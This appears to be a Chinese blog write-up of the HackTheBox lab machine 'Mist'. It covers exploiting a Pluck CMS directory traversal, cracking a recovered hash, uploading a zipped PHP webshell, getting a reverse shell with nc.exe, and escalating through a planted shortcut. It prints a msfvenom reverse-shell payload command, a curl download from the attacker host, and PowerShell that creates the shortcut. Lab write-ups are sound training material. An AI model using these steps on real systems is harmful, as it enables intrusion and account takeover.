当前位置: 首页 > news >正文

HackTheBox-Mist

整体思路

端口扫描->Pluck CMS组件文件读取漏洞->文件上传获取shell->创建指向exe的快捷方式来提权->

信息收集&端口利用

namp -sSVC 10.10.11.17

在这里插入图片描述

目标只开放了80端口,将mist.htb加入到hosts文件后,访问mist.htb

Pluck CMS文件读取

在这里插入图片描述

在主界面发现一个admin链接,访问它

在这里插入图片描述

在Exploit-db中搜索相关漏洞,发现存在Pluck CMS 4.7 - Directory Traversal

在这里插入图片描述

能够做到任意文件读取,这里也尝试读取win.ini

在这里插入图片描述

发现被检测出攻击行为,怀疑是…/被探测,尝试绕过也无效

回到POC,根据POC来看,它是针对于album的文件读取,那么有没有地方是上传album的地方呢?经过寻找,发现data目录下还有一个settings文件夹,其中的/modules/albums文件夹下有一个admin_backup.php文件

在这里插入图片描述

在这里插入图片描述

用刚刚的POC对该文件进行读取

在这里插入图片描述

得到一串密文,使用hash-identifier识别出可能的hash值后,用john对其进行解密

在这里插入图片描述

在这里插入图片描述

解得密码为lexypoo97,登录进网站

文件上传获取shell

Pluck插件还存在一个文件上传漏洞,登录后在admin.php?action=installmodule目录下上传zip文件,将php代码打包进zip文件中,上传后即可访问到该php文件,具体步骤如下

访问文件上传界面

在这里插入图片描述

将大马写入php文件,压缩成zip文件

在这里插入图片描述

上传zip

在这里插入图片描述

上传完成后,会在/data/modules下看到上传的文件

在这里插入图片描述

访问she11/she11.php

在这里插入图片描述

本地开启http服务,上传完nc.exe后将shell反弹到kali上

在这里插入图片描述

在这里插入图片描述

创建快捷方式提权(原理暂时未知)

在Common Applications文件夹下创建一个Windows快捷方式(.lnk),并将其指向/xmapp/htdocs/下的payload.exe

创建payload.exe,并上传

kali:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=9100 -f exe -o payload.exe
靶机:curl http://10.10.14.8:9999/payload.exe -o payload.exe
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("c:\Common Applications\Notepad.lnk")
$lnk.TargetPath = "c:\xampp\htdocs\payload.exe"
$lnk.Save()

等待一段时间后,相当于Brandon用户点击了该快捷方式,执行了payload.exe,拿到该用户权限

在这里插入图片描述
---------------------待更新(暂时没思路了QAQ)---------------------

http://www.lryc.cn/news/330014.html

相关文章:

  • 游戏引擎中的声音系统
  • 【WPF应用29】WPF中的ComboBox控件详解与应用示例
  • Unity UGUI之Text组件基础认识
  • LeetCode 2810.故障键盘:双端队列模拟
  • ssm015基于java的健身房管理系统的设计与实现+vue
  • 【解决方案】荣耀系统Android8.0 system目录Read-only file system
  • 【Web】记录Polar靶场<简单>难度题一遍过(全)
  • 生产制造园区数字孪生3D大屏展示提升运营效益
  • R语言技能 | 不同数据类型的转换
  • python如何处理文本错误
  • Cesium 批量种树
  • Docker基础系列之TLS和CA认证
  • 总结:微信小程序中跨组件的通信、状态管理的方案
  • 企业能耗数据分析有哪些优势?怎样进行分析?
  • containerd配置HTTP私仓
  • 掌握Go语言:Go语言类型转换,无缝处理数据类型、接口和自定义类型的转换细节解析(29)
  • Chatgpt掘金之旅—有爱AI商业实战篇|文案写作|(三)
  • c++20 的部分新概念及示例代码-Contracts,Ranges
  • pytorch剪枝
  • 马斯克旗下xAI发布Grok-1.5,相比较开源的Grok-1,各项性能大幅提升,接近GPT-4!
  • 数据结构与算法 顺序串的基本运算
  • 2024年04月数据库流行度最新排名
  • golang语言系列:SOLID、YAGNI、KISS等设计原则
  • Meta Pixel:助你实现高效地Facebook广告追踪
  • 基于Arduino IDE 野火ESP8266模块 文件系统LittleFS 的开发
  • 通讯录改造———文件版本
  • FastAPI Web框架教程 第13章 WebSocket
  • 将 Elasticsearch 向量数据库引入到数据上的 Azure OpenAI 服务(预览)
  • SeLinux 常见的宏
  • 图解PyTorch中的torch.gather函数和 scatter 函数